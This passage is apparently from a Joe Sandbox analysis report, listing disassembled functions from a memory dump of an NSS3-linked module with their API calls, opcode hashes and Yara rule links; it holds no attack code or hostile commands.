                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memset$CriticalEnterSectionUnlockValuefree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 65992600-0
                                                                                                                                                                                                                                                            • Opcode ID: 66855558cc35143aa0064bb85b1b8ccc52279c56f9234c39f6801931ea6a1129
                                                                                                                                                                                                                                                            • Instruction ID: a2d7906fa424a5840400cbb26ae83f55fee8708c9ffb7508647844dfe6e421cd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66855558cc35143aa0064bb85b1b8ccc52279c56f9234c39f6801931ea6a1129
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E115BB6E002019FEB00AFB8DC86F1AFB78FF05748F141665E90897201EB75E95287E1
                                                                                                                                                                                                                                                            Function 6BED8A90 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BED8FE0: PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6BEE0710), ref: 6BED8FF1
                                                                                                                                                                                                                                                              • Part of subcall function 6BED8FE0: calloc.MOZGLUE(00000001,00000000,?,?,6BEE0710), ref: 6BED904D
                                                                                                                                                                                                                                                              • Part of subcall function 6BED8FE0: memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6BEE0710), ref: 6BED9066
                                                                                                                                                                                                                                                              • Part of subcall function 6BED8FE0: PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6BEE0710), ref: 6BED9078
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BED8AC1
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6BED8AD6
                                                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3 ref: 6BED8AE5
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BED8AF7
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 6BED8B02
                                                                                                                                                                                                                                                            • free.MOZGLUE ref: 6BED8B0E
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$calloc$CriticalPrivateSectionThread$ArenaDeleteEnterFinishPoolUnlockfreememcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 417085867-0
                                                                                                                                                                                                                                                            • Opcode ID: 740d325c3733088027355e95cb1237180c697c644fd902e441444afc9598e582
                                                                                                                                                                                                                                                            • Instruction ID: a2ff0c5d9148bf62d9deafeae33506684e21bf6e9cab43b028b230e6299f8964
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 740d325c3733088027355e95cb1237180c697c644fd902e441444afc9598e582
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0115EB55046058FDB00BF78C58A62EBBF4FF01348F119A6DD88587201EB78E496CBD2
                                                                                                                                                                                                                                                            Function 6BF29930 Relevance: 9.1, APIs: 6, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00001000), ref: 6BF2993A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BEC87ED,00000800,6BEBEF74,00000000), ref: 6BF21000
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PR_NewLock.NSS3(?,00000800,6BEBEF74,00000000), ref: 6BF21016
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PL_InitArenaPool.NSS3(00000000,security,6BEC87ED,00000008,?,00000800,6BEBEF74,00000000), ref: 6BF2102B
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000050), ref: 6BF2994B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BF29999
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BF299A7
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6BF299B2
                                                                                                                                                                                                                                                            • PK11_GetInternalSlot.NSS3 ref: 6BF299BE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ArenaUtil$Arena_ErrorValue$Alloc_AllocateCriticalEnterFreeInitInternalK11_LockPoolSectionSlotUnlockcalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3107460537-0
                                                                                                                                                                                                                                                            • Opcode ID: 000dbfedb6bc53ce957a25a7b56ba80ff67aca8dd236de06f4bfab113265d8f9
                                                                                                                                                                                                                                                            • Instruction ID: 844b5c530c246e7aecfba5213c1061bb30c62cf4cfd39f4073f70a88704bca55
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 000dbfedb6bc53ce957a25a7b56ba80ff67aca8dd236de06f4bfab113265d8f9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A112733D0474247E720CFB99D02B56B3E49FA9754F009229FC89C7661FB74F1808251
                                                                                                                                                                                                                                                            Function 6BF53BD0 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55B40: PR_GetIdentitiesLayer.NSS3 ref: 6BF55B56
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6BF53BF9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: TlsGetValue.KERNEL32 ref: 6BF890AB
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: TlsGetValue.KERNEL32 ref: 6BF890C9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: EnterCriticalSection.KERNEL32 ref: 6BF890E5
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: TlsGetValue.KERNEL32 ref: 6BF89116
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: LeaveCriticalSection.KERNEL32 ref: 6BF8913F
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6BF53C10
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF53C26
                                                                                                                                                                                                                                                            • PORT_Strdup_Util.NSS3(?), ref: 6BF53C30
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6BF53C52
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6BF53C69
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Monitor$EnterValue$CriticalExitSection$IdentitiesLayerLeaveStrdup_Utilfree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 980993467-0
                                                                                                                                                                                                                                                            • Opcode ID: 6f99363c59a448b2191859444b8f0d67b6b094ab4bd4505cac873e8246bdf51a
                                                                                                                                                                                                                                                            • Instruction ID: 9caf63ac5eaba0c170c62bc7e272fe39608d01fbfea070f1777396d09d146a36
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f99363c59a448b2191859444b8f0d67b6b094ab4bd4505cac873e8246bdf51a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 700165B36106005BD7309A3DEC06A87B7F5DB51258F048835E85FC6231EA3AF435C692
                                                                                                                                                                                                                                                            Function 6BF2B990 Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800,00000000,?,FFFFFFFF,?,6BF2A78B,?), ref: 6BF2B9A4
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BEC87ED,00000800,6BEBEF74,00000000), ref: 6BF21000
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PR_NewLock.NSS3(?,00000800,6BEBEF74,00000000), ref: 6BF21016
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PL_InitArenaPool.NSS3(00000000,security,6BEC87ED,00000008,?,00000800,6BEBEF74,00000000), ref: 6BF2102B
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000014,?), ref: 6BF2B9B5
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                            • PK11_HashBuf.NSS3(00000004,00000000,E4840FC0,89000000,?,?,?), ref: 6BF2B9D9
                                                                                                                                                                                                                                                              • Part of subcall function 6BEEDDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6BEEDDEC
                                                                                                                                                                                                                                                              • Part of subcall function 6BEEDDD0: PK11_DigestBegin.NSS3(00000000), ref: 6BEEDE70
                                                                                                                                                                                                                                                              • Part of subcall function 6BEEDDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6BEEDE83
                                                                                                                                                                                                                                                              • Part of subcall function 6BEEDDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6BEEDE95
                                                                                                                                                                                                                                                              • Part of subcall function 6BEEDDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6BEEDEAE
                                                                                                                                                                                                                                                              • Part of subcall function 6BEEDDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6BEEDEBB
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?), ref: 6BF2B9EC
                                                                                                                                                                                                                                                            • SGN_CreateDigestInfo_Util.NSS3(00000004,00000000,00000014,?,?,?,?,?,?,?), ref: 6BF2B9FD
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6BF2BA0A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: K11_Util$Digest$Arena$Arena_Value$Alloc_AllocateBeginContextCreateCriticalDestroyEnterErrorFinalFindFreeHashInfo_InitLockPoolResultSectionTag_Unlockcalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2979523880-0
                                                                                                                                                                                                                                                            • Opcode ID: 6af475452566dea36314ae8299f84ba9469c5cb4869aaa8fd19007185aaf2503
                                                                                                                                                                                                                                                            • Instruction ID: c9e8283b9ae3e702e28ccf50a4d2c6c84e6c1082f5350662ac70b6cad6eafd15
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6af475452566dea36314ae8299f84ba9469c5cb4869aaa8fd19007185aaf2503
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C01F2B7A8030226FB000AF66C43F2636498BD1799F150570FF189A1A3FBBAD90086B1
                                                                                                                                                                                                                                                            Function 6BFD8910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6BFD892E
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB0F00: PR_GetPageSize.NSS3(6BEB0936,FFFFE8AE,?,6BE416B7,00000000,?,6BEB0936,00000000,?,6BE4204A), ref: 6BEB0F1B
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB0F00: PR_NewLogModule.NSS3(clock,6BEB0936,FFFFE8AE,?,6BE416B7,00000000,?,6BEB0936,00000000,?,6BE4204A), ref: 6BEB0F25
                                                                                                                                                                                                                                                            • PR_Lock.NSS3 ref: 6BFD8950
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6BEB1A48), ref: 6BF89BB3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6BEB1A48), ref: 6BF89BC8
                                                                                                                                                                                                                                                            • getprotobynumber.WSOCK32(?), ref: 6BFD8959
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?), ref: 6BFD8967
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?), ref: 6BFD896F
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?), ref: 6BFD898A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4143355744-0
                                                                                                                                                                                                                                                            • Opcode ID: e66243bf0e41e2e7013fde866cfe01c76d0ec468047271211f767ed26b7065c9
                                                                                                                                                                                                                                                            • Instruction ID: f69cba6c676bcdc3a3aa30c177da13e83b51ac842b3c775a0093714978c4738d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e66243bf0e41e2e7013fde866cfe01c76d0ec468047271211f767ed26b7065c9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4411E577E101219BCB006FB99845A4A7778EF45B74F1952A5EC05972B2DB388C00C7C7
                                                                                                                                                                                                                                                            Function 6BEDAB10 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(D958E852,6BEE1397,5B5F5EC0,?,?,6BEDB1EE,2404110F,?,?), ref: 6BEDAB3C
                                                                                                                                                                                                                                                            • free.MOZGLUE(D958E836,?,6BEDB1EE,2404110F,?,?), ref: 6BEDAB49
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(5D5E6C0D), ref: 6BEDAB5C
                                                                                                                                                                                                                                                            • free.MOZGLUE(5D5E6C01), ref: 6BEDAB63
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6BEDAB6F
                                                                                                                                                                                                                                                            • free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6BEDAB76
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6BF0F854
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6BF0F868
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6BF0F882
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: free.MOZGLUE(04C483FF,?,?), ref: 6BF0F889
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6BF0F8A4
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6BF0F8AB
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6BF0F8C9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0F820: free.MOZGLUE(280F10EC,?,?), ref: 6BF0F8D0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 682657753-0
                                                                                                                                                                                                                                                            • Opcode ID: 6ccf22e15f265d85b7ccf5e387cbb27e5ec9b6961008c798109ec97542db43db
                                                                                                                                                                                                                                                            • Instruction ID: 8193cd1013a8148e889cb74cc817eee2454abb4c7d7449a8666c7c1b8003bea1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ccf22e15f265d85b7ccf5e387cbb27e5ec9b6961008c798109ec97542db43db
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A01B5B2540605ABCA019BB4EC85847B37CEA457393140635EA0983600D73AF557DBE1
                                                                                                                                                                                                                                                            Function 6BF2B920 Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000000C,00000000,FFFFFFFF,?,6BF2AD91), ref: 6BF2B927
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: calloc.MOZGLUE ref: 6BF20D50
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20D30: TlsGetValue.KERNEL32 ref: 6BF20D6D
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000010), ref: 6BF2B93B
                                                                                                                                                                                                                                                            • PK11_GenerateRandom.NSS3(00000000,00000010), ref: 6BF2B950
                                                                                                                                                                                                                                                              • Part of subcall function 6BF13F50: TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6BEFE80C,00000000,00000000,?,?,?,?,6BF08C5B,-00000001), ref: 6BF13FA1
                                                                                                                                                                                                                                                              • Part of subcall function 6BF13F50: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6BEFE80C,00000000,00000000,?,?,?,?,6BF08C5B,-00000001), ref: 6BF13FBA
                                                                                                                                                                                                                                                              • Part of subcall function 6BF13F50: PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6BEFE80C,00000000,00000000,?,?,?,?,6BF08C5B,-00000001), ref: 6BF13FFE
                                                                                                                                                                                                                                                              • Part of subcall function 6BF13F50: PR_SetError.NSS3 ref: 6BF1401A
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BF2B961
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BF2B96F
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BF2B97A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
